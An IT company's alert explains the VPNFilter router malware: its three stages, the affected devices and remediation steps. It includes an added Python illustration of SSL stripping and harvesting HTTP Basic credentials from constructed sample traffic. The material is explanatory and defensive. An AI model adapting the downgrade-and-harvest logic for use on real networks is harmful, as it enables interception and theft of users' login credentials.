Categories: Cybersecurity, Malware, Security Alert

This is an alert for new malware that the Department of Justice has attributed to a group of threat actors called Sofacy (also known as APT28 and Fancy Bear), a hacking team backed by Russian intelligence. In computer security, "malware" is simply shorthand for malicious software: any program written with the intent of doing harm to data, devices, or people. Common types include viruses, trojans, spyware, worms, and ransomware. Each type has its own objectives, and each requires a different removal method.


In May 2018, Cisco Talos, a cyber threat intelligence team, reported that hundreds of thousands of routers in as many as 54 countries had been infected with new malware known as "VPNFilter." We now know that it targets even more devices than the initial report suggested. Affected equipment includes routers from Linksys, MikroTik, Netgear, TP-Link, ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE, as well as QNAP network-attached storage (NAS) devices. The FBI has advised owners of small-office and home routers to reboot their devices; because an infection cannot easily be confirmed from the outside, you should assume your router may be affected and take the steps below to clean it and close the hole that let the malware in.

How Does VPNFilter Work?
Upon infecting a router, VPNFilter deploys in three stages. These stages make it possible for hackers to gather intelligence, steal information, and commit destructive or disruptive attacks.

Stage 1: The first stage establishes a persistent foothold on the device and locates the attackers' command-and-control server so that it can download the later stages. Unlike the other stages, Stage 1 survives a reboot, so a rebooted router can simply be reinfected with Stages 2 and 3. A factory reset removes it, but unless the router is then patched with a firmware update the vulnerability used to install it in the first place remains open.

Stage 2: The main payload. It deploys modules capable of command execution, file collection, and unauthorized data transfer. Some versions of Stage 2 also carry a "self-destruct" feature that, once activated, overwrites a critical part of the device's firmware and reboots it, leaving the router unusable. Because Stage 2 can also run arbitrary commands, the attackers could achieve the same result on almost every infected device even where that feature is absent. Stage 2 does not survive a reboot, but Stage 1 can download it again.

Stage 3: Plug-in modules extend Stage 2. One is a packet sniffer that lets the attackers inspect traffic passing through the router before it reaches you; another lets them tamper with that traffic. They can change what you see, inject malicious content, or steal sensitive data as it travels between your computer and a website. Because the module can downgrade HTTPS connections to unencrypted HTTP, usernames and passwords that would normally be protected by encryption can be captured and sent to the attackers.
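As an added illustration (not VPNFilter's own code, and not from the original alert), the Python below shows what an on-path sniffer on a compromised router can do with traffic that is not encrypted: rewrite https:// links in a plaintext page to http:// so the browser's next request goes out unencrypted, then read the HTTP Basic Authorization header from that request. The traffic samples and the hostname login.example.test are constructed for the example. A TLS record is shown passing through untouched, which is exactly why the downgrade step matters to the attacker.

```python
"""Illustration (not VPNFilter's own code) of what an on-path packet
sniffer on a compromised router can do with web traffic:
  1. rewrite https:// links in plaintext HTML responses to http://
     (an "SSL stripping" downgrade), and
  2. harvest HTTP Basic Authorization headers from the plaintext
     requests that follow.
All sample traffic below is constructed for this example."""
import base64
import re

# Matches a Basic auth header line; re.M makes ^ and $ work per header line.
AUTH_RE = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.M)


def strip_https_links(response: bytes) -> bytes:
    """Downgrade https:// URLs in a plaintext HTTP response to http://.

    A TLS record (first byte 0x16 = handshake, 0x17 = application data)
    is opaque to an on-path sniffer and is forwarded unchanged."""
    if response[:1] in (b"\x16", b"\x17"):
        return response
    return response.replace(b"https://", b"http://")


def harvest_basic_auth(request: bytes):
    """Return (user, password) if the request carries HTTP Basic auth in
    the clear, otherwise None."""
    m = AUTH_RE.search(request)
    if not m:
        return None
    try:
        creds = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, password = creds.partition(b":")
    return user.decode(errors="replace"), password.decode(errors="replace")


def on_path_observer(flows):
    """Process (direction, payload) pairs the way a compromised router on
    the path would. Returns the traffic actually forwarded and the list of
    credentials captured along the way."""
    forwarded, captured = [], []
    for direction, payload in flows:
        if direction == "server->client":
            forwarded.append(strip_https_links(payload))
        else:
            forwarded.append(payload)
            creds = harvest_basic_auth(payload)
            if creds:
                captured.append(creds)
    return forwarded, captured


# Constructed sample flows: a plaintext page with an https:// login link,
# the browser's follow-up request (now over plain HTTP), and two TLS
# records that the sniffer cannot read.
SAMPLE_FLOWS = [
    ("server->client",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
     b'<a href="https://login.example.test/admin">Sign in</a>'),
    ("client->server",
     b"GET /admin HTTP/1.1\r\nHost: login.example.test\r\n"
     b"Authorization: Basic " + base64.b64encode(b"alice:s3cret") + b"\r\n\r\n"),
    ("client->server",  # TLS ClientHello fragment: nothing readable here
     b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00"),
    ("server->client",  # TLS ServerHello fragment: passed through untouched
     b"\x16\x03\x03\x00\x06\x02\x00\x00\x02\x03\x03"),
]


if __name__ == "__main__":
    _, stolen = on_path_observer(SAMPLE_FLOWS)
    for user, password in stolen:
        print(f"captured credentials: {user}:{password}")
```

The point of the example is not the regex but the contrast: the same credentials sent inside the TLS records are invisible to the router, so the attacker's first move is to make sure the browser never sends them that way.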

How Can VPNFilter Be Fixed?
VPNFilter is hard to prevent, and patching routers isn't something average users can easily do on their own. Fortunately, its impact can be mitigated.

Reset your router to factory defaults to clear all three stages of VPNFilter (a plain reboot clears only the second and third), then contact our office for assistance applying the firmware update that closes the vulnerability used to install Stage 1; without that update the device can simply be reinfected. Since your login credentials may already have been stolen, change the router's administrative password and any other default passwords once it is back online.

Rebooting the device per the FBI's recommendation may not be enough, however. A restart clears the actively malicious Stage 2 and 3 packages, but Stage 1 remains and can download them again. The DOJ, FBI, and other agencies have vowed to intensify efforts to disrupt the threat and expose the perpetrators. Ask a member of our team how to stay safe when accessing and browsing the web.

About the Author: Shenandoah Valley IT
